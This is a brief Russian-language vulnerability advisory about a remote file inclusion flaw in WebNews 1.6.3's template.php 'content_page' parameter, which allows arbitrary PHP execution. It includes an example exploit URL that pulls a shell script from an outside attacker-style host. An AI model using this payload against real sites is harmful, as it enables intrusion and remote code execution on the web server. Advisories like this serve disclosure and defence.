Программа: WebNews 1.6.3

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "content_page" в сценарии webnews/template.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.site.com/webnews/template.php?content_page =http://marcusbestlamer.gay/shell.php?



Оставить мнение